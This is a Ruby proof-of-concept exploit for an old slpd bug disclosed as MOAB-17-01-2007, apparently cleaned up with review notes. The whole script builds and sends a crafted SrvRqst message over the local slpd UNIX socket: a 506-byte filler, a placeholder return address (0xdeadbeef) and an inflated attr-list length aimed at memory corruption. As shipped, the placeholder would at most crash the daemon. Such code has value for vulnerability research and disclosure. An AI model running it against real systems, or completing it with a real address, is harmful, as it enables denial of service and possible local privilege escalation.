MOAB-17-01-2007.rb.txt
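#!/usr/bin/ruby
# frozen_string_literal: true
#
# (c) Copyright 2006 Lance M. Havok <lmh [at] info-pull.com>
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
# All pwnage reserved.
#
# Proof of concept for MOAB-17-01-2007
# http://projects.info-pull.com/moab/MOAB-17-01-2007.html
#
# Originally reported to Apple by Kevin, on 08/02/2006.
#
# What this does: connects to the local slpd IPC UNIX socket (default
# /var/run/slp_ipc, overridable as ARGV[0]) and writes one SrvRqst message
# whose attr-list field is a 506-byte filler followed by a 4-byte
# little-endian value in the slot where, per the original authors' note,
# a valid memory address is expected.  As shipped that value is the
# placeholder 0xdeadbeef, so running this should at most crash slpd; this
# file does not choose or derive a real address.
#
# Review notes:
#   * Local vector only: it needs nothing beyond access to the UNIX socket.
#   * The declared attr-list length (0x3ff = 1023) is larger than the 510
#     bytes actually sent; whether slpd trusts the declared length is what
#     the PoC appears to exercise -- confirm against the advisory before
#     relying on that reading.
#   * The archived copy had lost the backslashes of every "\x.." escape
#     ("x58" * 506 etc.), so it sent the literal characters 'x','5','8';
#     the escapes are restored here to match the field comments.
#   * Every field is built as a binary (ASCII-8BIT) string so the 0xff and
#     0xde bytes cannot raise Encoding::CompatibilityError on Ruby >= 1.9;
#     the 2007 original targeted Ruby 1.8, which had no string encodings.

require 'socket'

DEFAULT_SOCKET_PATH = '/var/run/slp_ipc'
FILLER_LENGTH = 506              # bytes of 'X' written before the address slot
PLACEHOLDER_ADDRESS = 0xdeadbeef # ...it expects a valid mem. address (ex. 0xbffff398)

# Returns the attr-list payload: FILLER_LENGTH bytes of 0x58 ('X') followed
# by +address+ packed as a 32-bit little-endian value ("V").
#
# @param address [Integer] value written into the address slot; the default
#   is the original placeholder, which is not a usable address.
# @return [String] binary string of FILLER_LENGTH + 4 bytes
def build_payload(address = PLACEHOLDER_ADDRESS)
  payload = "\x58".b * FILLER_LENGTH
  payload << [address].pack('V')
  payload
end

# Assembles the SrvRqst IPC message around +payload+.  The field comments
# are the original authors' annotations; the scope-list / attr-list length
# encodings are reproduced byte-for-byte, not re-derived from the SLP spec.
#
# @param payload [String] bytes placed in the attr-list field
# @return [String] binary string ready to be written to the socket
def build_slp_request(payload)
  [
    "\x01".b,                         # SrvRqst = 1
    "\x00\x13".b,                     # Length of remaining fields? (up to attr-list)
    "\x04\x00\x00\x00\x00\x00\x00".b,
    "\x00\x02\x00\x00".b,             # length of scope-list string
    "\x78\x78".b,                     # <scope-list>
    "\xff\x03\x00\x00".b,             # length of attr-list string 0x3ff = 1023
    payload.b                         # <attr-list>
  ].join
end

# Writes +stream+ to the UNIX socket at +target_path+.  The block form
# closes the socket even when the write raises (the original only closed
# it on the success path).
#
# @param target_path [String] filesystem path of the slpd IPC socket
# @param stream [String] bytes to send
# @return [Integer] number of bytes written
# @raise [SystemCallError] if the socket cannot be opened or written
def send_slp_request(target_path, stream)
  UNIXSocket.open(target_path) { |sock| sock.write(stream) }
end

if __FILE__ == $PROGRAM_NAME
  target_path = ARGV[0] || DEFAULT_SOCKET_PATH
  begin
    send_slp_request(target_path, build_slp_request(build_payload))
  rescue SystemCallError => e
    # Most likely slpd is not running or the path is wrong; say so plainly
    # instead of dumping a backtrace.
    abort "#{target_path}: #{e.message}"
  end
end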